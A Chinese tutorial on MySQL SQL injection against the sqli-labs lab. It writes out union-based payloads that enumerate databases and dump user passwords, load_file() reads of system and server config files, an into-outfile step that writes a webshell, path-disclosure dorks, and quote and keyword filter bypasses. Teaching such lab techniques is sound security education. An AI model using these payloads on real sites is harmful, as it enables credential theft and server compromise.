sql注入mysql注入
#跨库查询及应用思路
information_schema表特性,记录数据库名、表名、列名对应表
information_schema.schemata:存储所有数据库名
schema_name:数据库名
利用sqlilabs第2关进行演示
1.猜解列名数量
可知字段数为3。
2.获取所有数据库名
获取所有数据库名:http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
可知改系统上有10个数据库
sqlilabs通过查询对应的数据库为security。
3.获得pikachu数据库名下的表名信息
在网站中一个网站对应一个数据库。由上图可知sqlilabs的数据库为security,靶场pikachu对应的数据库名为pikachu。
获取pikachu数据库名下的表名信息:
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='pikachu'
有4张表。
4.获取指定数据库名下的表名的列名信息
获取pikachu据库下的users表的列名信息:
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='pikachu'
5.获取表数据
获取数据库pikachu数据库中users表中的具体信息:
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,username,password from pikachu.users limit 0,1--+
#文件读写操作
读取函数:load_file()
导出函数:into outfile或into dumpfile
读取数据:sele文件的路径’)
1.读取E:\下的test.txt文件
select load_file('e:/test.txt');
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,load_file('e:/test.txt'),3 --+
2.写入数据
写入数据数据到e盘下的test.txt文件
写入木马方法:
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,'木马',3 into outfile 'e:/test.php' --+
3.路径获取方法
(1).单引号爆路径
就像测试SQL注入一样在参数后面加上单引号。
http://localhost/?id=1'
(2).错误参数值爆路径
通过第一种方式可以会触发waf,因此可以通过错误的参数值来爆网站路径。
http://localhost/?id=-1
http://localhost/?id=oqewe
(3)通过搜索引擎获取
通过搜索引擎语法可能可以获取到网站路径,如:
Site:xxx.com warning
Site:xxx.com "fatal error"
intext:warning
(4)测试文件获取路径
网站通过XAMPP或者phpstudy等软件搭建的话,会存在一些测试文件,比如:
/test.php
/ceshi.php
/info.php
/phpinfo.php
/php_info.php
/1.php
/l.php
/x.php
(5)配置文件获取路径
如果注入点有文件读取权限,就可以通过load_file函数读取配置文件,再从中寻找路径信息。
Windows配置文件:
c:\windows\php.ini php配置文件
c:\windows\system32\inetsrv\MetaBase.xml IIS虚拟主机配置文件
Linux配置文件:
/etc/php.ini php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf 虚拟目录配置文件
XAMPP配置文件:
Xampp文件路径
C:\xampp\htdocs httpd.com配置文件
C:\xampp\apache\conf/httpd.conf vhosts.conf虚拟主机
C:\xampp\apache\onf\extra\httpd-vhosts.conf
phpnow配置文件:
网站默认路径
D:\PHPnow-1.5.6\htdocs httpd.conf配置文件
D:\PHPnow-1.5.6\Apache-20\conf\httpd.conf vhosts.conf虚拟主机
D:\PHPnow-1.5.6\Apache-20\conf\extra\vhosts.conf
phpstudy配置文件:
网站默认路径
C:\phpstudy\www httpd.conf配置文件
C:\phpStudy\Apache\conf\httpd.conf vhosts.conf虚拟主机
C:\phpStudy\Apache\conf\extra\httpd-vhosts.conf
LAMPP配置文件:
网站默认路径
/opt/lampp/htdocs httpd.conf配置文件
/opt/lampp/etc/httpd.conf vhosts.conf虚拟主机
/opt/lampp/etc/extra/httpd-vhosts.conf
(6)nginx文件类型错误解析爆路径
要求Web服务器是nginx,且存在文件类型解析漏洞。有时在图片地址后加/x.php,该图片不但会被当作php文件执行,还有可能爆出物理路径。
http://localhost/test.jpg/x.php
(7)phpmyadmin爆路径
/phpmyadmin/themes/darkblue_orange/layout.inc.php
(8)配合远程代码执行漏洞
比如eval()函数可控的话,直接传入phpinfo(),通过phpinfo页面中Document_Root参数获取网站绝对路径。
#常见文件写入问题
1.魔术引号开关
magic_quotes_gpc=on时,输入数据中引号(')、双引号(“)、右斜杠(\)、null(null)等字符都会被加上反斜线(\)。
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,load_file('e:\\test.txt'),3 --+
\\被转义成\\\\,'转义成‘\
绕过方法:
将路径去掉引号采用十六进制编码即可绕过。
2.php语言的addslashes()函数
addslashes()函数与魔术引号作用类似,输入数据中引号(')、双引号(“)、右斜杠(\)、null(null)等字符都会被加上反斜线(\)。
3.内置函数int
我们修改第2关的php文件
再进行测试
无法注入!且无法绕过
4.自定义关键字
str_replace('select','warning',$id)函数将select替换成warning。
进行测试:
select被修改,修改大小写可以绕过。
sql注入mysql注入的更多相关文章
- 对MYSQL注入相关内容及部分Trick的归类小结
前言 最近在给学校的社团成员进行web安全方面的培训,由于在mysql注入这一块知识点挺杂的,入门容易,精通较难,网上相对比较全的资料也比较少,大多都是一个比较散的知识点,所以我打算将我在学习过程中遇 ...
- SQL 注入~MySQL专题
Recently, 团队在做一个关于SQL的项目,这个专题是项目中的一部分,该部分正是由我来负责的.今天,分享给正在奋斗中的伙伴们,愿,你们在以后的学习道路中能有自己的收获. ...
- sql注入--mysql
mysql数据库结构: 数据库A --> 表名 --> 列名 --> 数据 数据库B --> 表名 --> 列名 --> 数据 mysql数据库信息: my ...
- SQL注入之DVWA平台测试mysql注入
今天主要针对mysql常用注入语句进行测试. 测试环境与工具: 测试平台:DVWA,下载地址:http://down.51cto.com/data/875088,也可下载metaspolit-tabl ...
- 【sql注入教程】mysql注入直接getshell
Mysql注入直接getshell的条件相对来说比较苛刻点把 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正 ...
- 十三:SQL注入之MYSQL注入
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作,其中也会遇到很多的阻碍,相关防御手法也要明确,所谓知己知彼,百战不殆.作为安全开发工作者,攻 ...
- MySQL注入与防御(排版清晰内容有条理)
为何我要在题目中明确排版清晰以及内容有条理呢? 因为我在搜相关SQL注入的随笔博客的时候,看到好多好多都是页面超级混乱的.亲爱的园友们,日后不管写博客文章还是平时写的各类文章也要多个心眼,好好注意一下 ...
- Mysql注入小tips --持续更新中
学习Web安全好几年了,接触最多的是Sql注入,一直最不熟悉的也是Sql注入.OWASP中,Sql注入危害绝对是Top1.花了一点时间研究了下Mysql类型的注入. 文章中的tips将会持续更新,先说 ...
- 史上最完整的MySQL注入
原文作者: Insider 免责声明:本教程仅用于教育目的,以保护您自己的SQL注释代码. 在阅读本教程后,您必须对任何行动承担全部责任. 0x00 ~ 背景 这篇文章题目为“为新手完成MySQL注入 ...
随机推荐
- 使用 shell 脚本清理内存 buff/cache
#!/bin/bash printf "\e[0;32m数据写入硬盘中,请稍等\e[0m\n" #写入硬盘,防止数据丢失 sync;sync;sync printf "\ ...
- 树莓派使用docker安装青龙面板和改面板端口号
配置环境 系统:Raspbian 11(64位) 设备:树莓派4B 系统默认没有防火墙,所以就不用在防火墙中开放端口. 一.安装docker(已安装省略) 1.安装 curl -fsSL https: ...
- Smartbi报表工具的学习笔记,如何学好报表分析?
近期,因为工作需要,学习了一个报表工具Smartbi,这是国产BI软件,其功能还是挺强大的,并且学习成本很低,容易上手. 其实在学习Smartbi之前,我还学习了一段时间的微软BI工具sqlserve ...
- 基于mysql的报表工具有哪些?值得推荐的mysql报表工具
什么是SQL?SQL是结构化查询语言. 什么是数据库?数据库是用来存储数据的. 什么是mysql?Mysql是目前较为流行的数据库. 基于mysql的报表工具有哪些? 其实现在所有的报表工具,基本都支 ...
- MMU 以及 TLB
MMU 以及 TLB MMU(Memory Management Unit)内存管理单元: 一种硬件电路单元负责将虚拟内存地址转换为物理内存地址 所有的内存访问都将通过 MMU 进行转换,除非没有使能 ...
- 【C# IO 操作 】编程对缓冲区的理解
什么是缓冲区缓冲区又称为缓存,它是内存空间的一部分.也就是说,在内存空间中预留了一定的存储空间,这些存储空间用来缓冲输入或输出的数据,这部分预留的空间就叫做缓冲区.缓冲区根据其对应的是输入设备还是 ...
- Linux查看进程的4种方法
转至:https://www.cnblogs.com/hml-blog-com/p/11558369.html 进程是在 CPU 及内存中运行的程序代码,而每个进程可以创建一个或多个进程(父子进程). ...
- Windows server 2008 R2 多用户远程桌面配置详解(超过两个用户)
转至:https://www.jb51.net/article/139542.htm 注意:一下是针对win2008 server r2的操作 1. 创建三个本地管理员测试用户 user01 use ...
- mapreduce类型对应
public class OrderBean implements WritableComparable<OrderBean> { private Integer order_id; // ...
- mysql索引技术名词1-5
目录 索引技术名词 1.回表 2.覆盖索引 3.最左匹配原则 4.索引下推 5.谓词下推 索引技术名词 1.回表 注意: 1.如果依靠主键查询,叶子结点直接存储数据----主键B+树 2.如果依靠其他 ...